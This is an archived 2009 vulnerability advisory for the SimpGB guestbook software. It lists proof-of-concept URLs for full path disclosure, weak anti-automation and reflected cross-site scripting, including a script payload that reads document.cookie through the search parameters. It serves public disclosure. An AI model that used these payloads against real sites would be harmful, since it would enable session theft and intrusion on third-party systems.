Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22811
HistoryNov 19, 2009 - 12:00 a.m.

Vulnerabilities in SimpGB

2009-11-1900:00:00
vulners.com
7

Hello 3APA3A!

I want to warn you about security vulnerabilities in SimpGB.

These are Full path disclosure, Insufficient Anti-automation and
Cross-Site Scripting vulnerabilities.

Full path disclosure:

http://site/admin/index.php?lang=1

http://site/admin/pwlost.php?lang=1

http://site/admin/usered.php?lang=1&mode=comment&input_entrynr=44&entrylang=en

Insufficient Anti-automation:

http://site/admin/usered.php?lang=en&mode=comment&input_entrynr=44&entrylang=en

Login and password are fixed and are set at the page.

XSS:

http://site/search.php?searchvalues=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/search.php?category=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Vulnerable are SimpGB V1.37.3 and previous versions (and possibly next
versions).

I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/3460/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua